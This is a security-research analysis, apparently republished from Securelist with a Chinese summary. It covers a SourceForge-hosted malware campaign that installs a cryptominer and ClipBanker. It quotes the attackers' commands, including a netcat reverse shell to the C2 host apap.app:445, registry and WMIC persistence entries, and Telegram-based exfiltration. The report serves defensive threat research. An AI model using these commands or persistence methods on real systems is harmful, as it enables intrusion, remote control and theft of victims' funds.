攻击者利用SourceForge平台分发恶意软件,在看似合法的项目页面中嵌入恶意链接和下载按钮。用户点击后会被重定向至伪装页面下载伪装成Office工具的恶意压缩包vinstaller.zip。该压缩包内含加密文件installer.zip及密码提示文档Readme.txt。解压后运行installer.msi会执行嵌入式VB脚本并下载批处理脚本confvk从GitHub获取RAR密码解压恶意档案。 解压后的档案包含AutoIt解释器Input.exe及两个动态链接库Icon.dll和Kape.dll(均含压缩AutoIt脚本),以及Netcat网络工具ShellExperienceHost.exe及其依赖项libssl-1_1.dll、libcrypto-1_1.dll、vcruntime140.dll。 confvk批处理脚本执行以下操作: 1. 检测系统中是否已存在感染迹象(如AutoIt解释器路径); 2. 检查是否存在安全软件、虚拟环境或研究工具进程; 3. 若未检测到威胁,则继续执行; 4. 解压RAR档案并运行两个PowerShell脚本: - 第一个PowerShell脚本通过Telegram API发送感染设备信息; - 第二个PowerShell脚本下载并执行另一个批处理脚本confvz。 confvz批处理脚本进一步完成以下步骤: 1. 在%ProgramData%目录下创建三个子目录,并将解压出的文件分别移动至相应目录; 2. 在%USERPROFILE%\Cookies目录下创建ini.cmd和init.cmd批处理脚本; 3. 在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths下创建键值以关联这些批处理脚本; 4. 创建三个服务NetworkConfiguration、PerformanceMonitor和Update以实现自启动功能; 5. 作为备用启动方法,在注册表中添加键值以在MicrosoftEdgeUpdate.exe启动时触发cmd.exe执行start.exe; 6. 使用WMIC创建事件过滤器以每80秒触发一次handler命令:ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe(即通过Netcat建立与C2服务器apap.app:445的加密连接并启动cmd.exe); 7. 创建ErrorHandler.cmd文件,并通过WMIC设置每300秒触发一次cmd.exe执行Setup.exe(该Setup.exe实际指向%WINDIR%\System32\oobe\Setup.exe),从而间接执行ErrorHandler.cmd中的PowerShell脚本以通过Telegram API获取并执行远程指令。 最终目标是运行两个AutoIt脚本: - Icon.dll重新启动AutoIt解释器并注入矿工软件; - Kape.dll同样重启AutoIt解释器但注入ClipBanker恶意软件(用于劫持剪贴板中的加密货币钱包地址)。 受害者统计显示90%潜在受害者位于俄罗斯地区(共4,604名用户在2023年1月至3月期间遭遇此攻击)。 2025-4-8 10:0:25 Author: securelist.com(查看原文) 阅读量:9 收藏
Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge, a popular website providing software hosting, comparison, and distribution services. The site hosts numerous software projects, and anyone can upload theirs. One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project. The description and contents of officepackage provided below were also taken from GitHub.
Description of the “officepackage” project
Few know that projects created on sourceforge.net get a sourceforge.io domain name and web hosting services. Pages like that are well-indexed by search engines and appear in their search results.
Example of a search query and results containing officepackage.sourceforge.io
The project under investigation has been assigned the domain officepackage.sourceforge[.]io, but the page displayed when you go to that domain looks nothing like officepackage on sourceforge.net. Instead of the description copied from GitHub, the visitor is presented with an imposing list of office applications complete with version numbers and “Download” buttons.
The project as seen on the officepackage.sourcefoge.io domain
Hovering over one of the buttons reveals a seemingly legit URL in the browser status bar: https[:]//loading.sourceforge[.]io/download. It is easy to make the mistake of associating that URL with officepackage, as the buttons are on that project’s page. However, the loading.sourceforge.io domain suggests a different project on sourceforge.net, named loading.
URL associated with the “Download” button
Clicking the link redirects to a page with yet another “Download” button, this time in English.
Page for downloading the suspicious archive
Clicking that button finally downloads a roughly seven-megabyte archive named vinstaller.zip. This raises some red flags, as office applications are never that small, even when compressed.
The infection chain: from searching for office software to downloading an installer
The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.
Contents of vinstaller.zip
Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer. Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes. After we stripped the junk bytes, its true size was 7 megabytes.
Contents of installer.zip
Running the installer creates several files, with two being of interest to us: UnRAR.exe (a console archive utility) and a password-protected archive named 51654.rar. The installer then executes an embedded Visual Basic script. Attackers have long distributed password-protected archives along with unpacking utilities, passing the password via the command line. However, this case has an intermediary step. The installer files lack an archive password. Instead, to continue the infection chain, the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub. This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.
The infection chain: from launching the installer to downloading the confvk batch script
Here is a breakdown of how the batch script works. First, it checks for an existing infection by searching for the AutoIt interpreter at a specific path. If AutoIt is found, the script deletes itself and exits. If not, the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.
If both checks pass, the script unpacks the RAR archive and runs two PowerShell scripts within its code.
"%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\" |
Command to unpack the RAR archive executed by the batch file
One of the PowerShell scripts sends a message to a certain chat using the Telegram API. The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.
Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script
The other PowerShell script downloads another batch file, confvz, to process the files that were extracted from the RAR archive.
Contents of the RAR archive
The contents of the archive can be seen in the screenshot above. Below is a summary of each file.
| File | Description |
| Input.exe | AutoIt script interpreter |
| Icon.dll | Clean dynamic-link library with a compressed AutoIt script appended to it |
| Kape.dll | Clean dynamic-link library with a compressed AutoIt script appended to it |
| ShellExperienceHost.exe | Netcat network utility executable |
| libssl-1_1.dll | Netcat dependency dynamic-link library |
| vcruntime140.dll | Netcat dependency dynamic-link library |
| libcrypto-1_1.dll | Netcat dependency dynamic-link library |
The confvz batch file creates three subdirectories at %ProgramData% and moves the unpacked archive files into those. The first subdirectory receives Input.exe and Icon.dll, the second gets another Input.exe copy with Kape.dll, and the third gets all netcat files. The batch file then creates ini.cmd and init.cmd batch scripts at %USERPROFILE%\Cookies\ to run the files it copied. These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll (both containing compressed AutoIt scripts) as arguments.
Contents of the confvz batch file
Next, confvz generates keys in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\*. These link to the ini.cmd and init.cmd batch files. The keys allow running files using shortened names. For example, the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"::"%USERPROFILE%\Cookies\ini.cmd |
launches ini.cmd when running install.exe. Similarly, start.exe is registered as a link to init.exe, and Setup.exe links to the system utility %WINDIR%\System32\oobe\Setup.exe, normally launched during OS installation. We will revisit this utility later.
Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter without intermediate batch files.
Additionally, as a backup autostart method, confvz adds this registry key:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe" |
This runs a debugger when MicrosoftEdgeUpdate.exe is started. The debugger is set to execute start.exe, which, based on the earlier registry keys, points to init.cmd.
Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds. While disabled by default in more recent Windows versions, WMIC still functions in older systems.
The handler executes the following command:
ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe |
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection. This essentially creates a remote command line with apap[.]app:445 as the C2 server.
Finally, confvz creates a file:
%WINDIR%\Setup\Scripts\ErrorHandler.cmd |
This is a custom script you can build in Windows to streamline troubleshooting during OS installation. If a critical error occurs, the %System32%\oobe\Setup.exe utility finds and executes this file. However, the attackers have found a way to exploit it for automatic startup. They achieve this by again using the operating system’s built-in WMIC utility to establish an event filter that triggers the handler every 300 seconds. The handler is specified as %WINDIR%\System32\cmd.exe /c start Setup.exe, while Setup.exe, according to the registry keys created earlier, references the utility %WINDIR%\System32\oobe\Setup.exe, which executes ErrorHandler.cmd upon launch. The ErrorHandler.cmd file contains a short PowerShell script that uses the Telegram API to retrieve and execute a text string. This is another remote command line, but its output is not sent anywhere.
The infection chain: from executing confvk to setting up all the auto-start methods
The key malicious actions in this campaign boil down to running two AutoIt scripts. Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker. ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own. Users of crypto wallets typically copy addresses instead of typing them. If the device is infected with ClipBanker, the victim’s money will end up somewhere entirely unexpected.
Victims
The officepackage.sourceforge[.]io site has a Russian interface, suggesting a focus on Russian-speaking users. Our telemetry indicates that 90% of potential victims are in Russia, where 4,604 users encountered the scheme between early January and late March.
Takeaways
Distributing malware disguised as pirated software is anything but new. As users seek ways to download applications outside official sources, attackers offer their own. They keep looking for new ways to make their websites look legit. The scheme described here exploits SourceForge feature of creating a sourceforge.io subdomain for each sourceforge.net repository.
The persistence methods are worthy of note as well. Attackers secure access to an infected system through multiple methods, including unconventional ones. While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.
We advise users against downloading software from untrusted sources. If you are unable to obtain some software from official sources for any reason, remember that seeking alternative download options always carries higher security risks.
如有侵权请联系:admin#unsafe.sh